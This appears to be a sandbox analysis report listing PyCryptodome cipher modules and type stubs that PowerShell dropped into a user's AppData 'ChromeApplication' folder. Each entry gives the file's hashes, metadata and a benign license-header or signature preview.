                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5252
                                                                                                                                                                                                  Entropy (8bit):4.721675811667996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:dHIB0jcQHMsvI/S3oCFG+PdiIPskHzgirvO/ZEgR2lYvHipJjHeLEyEMWnP7a7jv:doFQHvo7dIUoeGgR2uvi/jqEyExPNOuG
                                                                                                                                                                                                  MD5:0EF036A0343812F8BD2CD7CC80B2BA95
                                                                                                                                                                                                  SHA1:B443E26A222338477A44BF29FD5ACA2942271B86
                                                                                                                                                                                                  SHA-256:717B865CC7A4417AEAF0EFA70B60EF7C42CBFDAE4433BD704EAB9DDF75C50486
                                                                                                                                                                                                  SHA-512:AA5E7F0BF9C5199B5E76441DECB0CC5A0899EDBE7517F6A6646D14205E727FCF35EA935A921EC90502B7783D28CDCC5BF648F8FA2A06FFDEFE302171332C6D3F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC4.py : ARC4..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\ARC4.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                  Entropy (8bit):4.892911336139007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                                                                                  MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                                                                                  SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                                                                                  SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
                                                                                                                                                                                                  SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\Blowfish.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6123
                                                                                                                                                                                                  Entropy (8bit):4.915681807073174
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:doFQHvofgiwZAEuVDYsgiiJsJWkGI9gmJt4qeA//RFWotKj:deQHvogySniiSYkGIOmJt4A/RYotKj
                                                                                                                                                                                                  MD5:C34B138E93044278085C0172B171945A
                                                                                                                                                                                                  SHA1:058CCA453B61AD12F6007A84E1626371EA2E5855
                                                                                                                                                                                                  SHA-256:9E71714F41AD4FC6499B83FF0199D1FF75D73D551A740CFFDC077D13AD930EDF
                                                                                                                                                                                                  SHA-512:39CA5D7161933F6AB86D14877E8E089D3BD11561494079B99C7B56209B074FAE50D31A8BA25760C3309E36BBB216A818ED49084E9479F0B47FEFC4F55BF2EC51
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/Blowfish.py : Blowfish..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\Blowfish.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1056
                                                                                                                                                                                                  Entropy (8bit):4.93319559592513
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+7vEStrF+olDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+DtrF+wJqJejbFoev
                                                                                                                                                                                                  MD5:ADC4E67BDA4767C9F270DD32CCECC085
                                                                                                                                                                                                  SHA1:69FE8AABD602E03066EE627CFD0185486383A618
                                                                                                                                                                                                  SHA-256:C108D97BABEE0989438F29A01B0B0B95AE54118434A49AE832FD0EB2310FB73F
                                                                                                                                                                                                  SHA-512:C613BA321D3F8D0C41BE9DE652A47839C2059F9BF53F1FAA9E5967193D1898EAFF394857D6EAB4E0AA24E2159733BC304AACE3A94DBF6CD2B200EBA8712477D2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgp

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\CAST.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6230
                                                                                                                                                                                                  Entropy (8bit):4.846211484152016
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:d2QHvVgdaKSnrF4xkOUBRkUtmz5t4AyRYotKw:UeVgd8n549aW75t4rYotKw
                                                                                                                                                                                                  MD5:1166B892369E19B4220BBC069D9CCABC
                                                                                                                                                                                                  SHA1:F8FFFEFAD392A8D7F79CD644B4D21D771D7458EF
                                                                                                                                                                                                  SHA-256:2E59E547BAF132E8553FC76E9AE2151B48C0610483E54130B0B6262A03F95903
                                                                                                                                                                                                  SHA-512:B99AA9B0F448B24BCF56DEB0BB30B948C1FBAE91692A78A291AE30A1935E4C74204A24925573E3E60777B5033CF748FD7C0D4BEE3E79BCF3D8D5FBBB19E195CE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/CAST.py : CAST..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\CAST.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1021
                                                                                                                                                                                                  Entropy (8bit):4.948780176242253
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+TivieL/tixsDOIosswDNqDNMN3zb1DoeZ:K+1+O+O+s+8+s+w+TQieL/tixsDOIYwr
                                                                                                                                                                                                  MD5:DF4E506EF652F92CD4F1C01C3E91C3E0
                                                                                                                                                                                                  SHA1:49625B957B302755062BFEF1FD00A1C88F378C79
                                                                                                                                                                                                  SHA-256:A017C351D0BF5AEFC610A60EE41B968BC5C1FA5E78B9FA593FE3C9C278CE9550
                                                                                                                                                                                                  SHA-512:9B85DFA5B47C60337AEE04D48AF64FE2B5F03152498DE4C340B0A4C170262D0C5BE8549787AA0093592E2308A41AE88A725E8C2D6B340E3B6EB8B2803C0328D2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\ChaCha20.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11023
                                                                                                                                                                                                  Entropy (8bit):4.6255670465451315
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IcwYkUlRGziNzvPppkzBjfgEcTUjwzgLMZKPOYbCCtrBUpt:0rskrs9VqxwwlCihP8xfgZF6PPOqBUt
                                                                                                                                                                                                  MD5:7BAFD5D12D4086033A33111C77432273
                                                                                                                                                                                                  SHA1:3EC235810D8A590B23B1477BD37D4C897B08D7BC
                                                                                                                                                                                                  SHA-256:3D8F607DAED2F2C1E419E044E996FD835FA8687CE25D30DDE13F63971937F0D3
                                                                                                                                                                                                  SHA-512:E8543F1504C5E6B6A4D17B073F769830545E9A2085892AD5236DB2EFE07B80127577E8FAB29D1EDABCA4533EAD9DA5378C01B18B5FBF6F9C99DDF83F5E6E0CB5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\ChaCha20.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):798
                                                                                                                                                                                                  Entropy (8bit):4.852768717173627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                                                                                  MD5:7311A085F06CFB4AF892363A4CB21E0E
                                                                                                                                                                                                  SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                                                                                  SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                                                                                  SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\ChaCha20_Poly1305.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11897
                                                                                                                                                                                                  Entropy (8bit):4.951422413337409
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:0qrskrs9t3q/IIJOqi/JHxbkg9XRV8psd6agIojKVFtt:zrskrs9VqVi/j7XRViWkKVHt
                                                                                                                                                                                                  MD5:E433FA86720435190553A745AD2EB4F2
                                                                                                                                                                                                  SHA1:E3631F6CAFD1EEB7C94C4CD06E4879B764497735
                                                                                                                                                                                                  SHA-256:959D96E0C6F5A4D62BEBEA867CC9162CF0B32100F1A80ED1D98F7471D6480061
                                                                                                                                                                                                  SHA-512:5D5AB86FF50BC65FBB993B4AB81F93516F7D32F90B5DACA5ABD656997FB9BAC62C4BD57B0684248776CC4929B72CEBC984C80921B343AFFC55184C4DD0A7BB08
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\ChaCha20_Poly1305.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1107
                                                                                                                                                                                                  Entropy (8bit):4.862920256864568
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                                                                                  MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                                                                                  SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                                                                                  SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                                                                                  SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\DES.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6105
                                                                                                                                                                                                  Entropy (8bit):4.865470874769693
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dOFQHvotgiwHCXjG6DH5K0kmIbU6Ct4qeAYZRFWotK0:dcQHv2gUqC5K0kmIct4NZRYotK0
                                                                                                                                                                                                  MD5:1B182D8CD016EDC5F53015A433BE05D5
                                                                                                                                                                                                  SHA1:531C8DB19CDA7EDEE5B45B83D0C309F4EA65C1D5
                                                                                                                                                                                                  SHA-256:BAE52D7A7D2CD509D466156DC2878D7E4194BB304A8CB555F353EC00108C9186
                                                                                                                                                                                                  SHA-512:3D08AF59AA18156E5086E061BBDDD3E7E321A5EB98B1EFE4CCE56D7CA668CDFD167ECEF8F42A66FB6450797F21A6A21841FE24A606B0F1F959375CA6F4279227
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES.py : DES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\DES.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1001
                                                                                                                                                                                                  Entropy (8bit):4.909258900429456
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+Aiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHT:K+1+O+O+s+8+s+w+H7XY6JqJejbFoeRz
                                                                                                                                                                                                  MD5:1EA64CB2FDD42F20112DF249B9A7CB87
                                                                                                                                                                                                  SHA1:633110F4D03C3EDF415640989802108EC2764422
                                                                                                                                                                                                  SHA-256:98BBDA18A15E4757AB66CC049EADA7FE944FF2D1093EE70F643D634CAF296E7E
                                                                                                                                                                                                  SHA-512:2845EBEC10C8250A0B4C7D0AB87245CF91D07D0F0973B0289516F94494D5698E17A9709D1B411B04908F02FC83B0922F0AEDEADF7901106184EA247729DAADF8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_size: int.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\DES3.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7112
                                                                                                                                                                                                  Entropy (8bit):4.8687640980714715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:dKQHvCgthz1GPoiRxwKIUK9t4A1zRYotKa:YeCgHAhRn9K9t42NYotKa
                                                                                                                                                                                                  MD5:44204A7CBBF99E82EB31B7F746B43AB3
                                                                                                                                                                                                  SHA1:4589336CF1A1D1E74DAAA10E87C898DD804DB7F8
                                                                                                                                                                                                  SHA-256:70D9B525599D85146924EF8DBDF0980C42A03F4FBB2D01A2CADBF7ED2D43CD93
                                                                                                                                                                                                  SHA-512:1D0403F3BCDF6AE8A7A7D2FE339112B7BE604EA1D103388547760FF73CBBC7DF5106CF6D702A6134CC4C51A836FEB3ED42AC0BFDE90A46E67F684ECCA3DDF4F6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES3.py : DES3..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\DES3.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1073
                                                                                                                                                                                                  Entropy (8bit):4.981416466224206
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RENbKAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+4NINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1+O+O+s+8+s+w+4GxOkDRJqJejbFo7
                                                                                                                                                                                                  MD5:4E6C49F8750DD064B28D3138434CC5F3
                                                                                                                                                                                                  SHA1:121984851A159ED24D11E4E79DF4B0B4BCF6AE63
                                                                                                                                                                                                  SHA-256:9005CB3F60F682B7840F7112D940128AE8EA1777DAC8C1F3A4B8F0E17F6A398B
                                                                                                                                                                                                  SHA-512:E21FC0A0B2D2CCD167CC2B9B0B9DE66771B11AF4CF2D9510F53E029D1CC43407A03B2866C000E6E31975C73B9457BB3CB99317E8FC51D276B84C93E9CC6CBEB3
                                                                                                                                                                                                  Malicious:false
